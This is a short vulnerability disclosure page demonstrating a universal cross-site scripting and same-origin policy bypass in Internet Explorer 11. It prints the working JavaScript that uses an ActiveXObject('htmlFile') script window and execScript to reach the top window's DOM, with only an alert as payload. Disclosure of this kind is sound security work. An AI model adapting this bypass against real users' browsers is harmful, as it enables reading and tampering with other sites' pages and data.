IE11 - UXSS / SOP Bypass


Below we have an iframe pointing to brokenbrowser.com which can access this top window DOM bypassing the SOP policy.




The code inside the iFrame is simple:

doc = new ActiveXObject("htmlFile");
win = doc.Script; // window object of the above document
win.opener = top; // pass a reference to the top window
win.execScript("alert(opener.document.URL)");// Full SOP bypass




If you have questions, contact me here: @magicmac2000
For more information about this vulnerability, UXSS IE ActiveXObject/htmlFile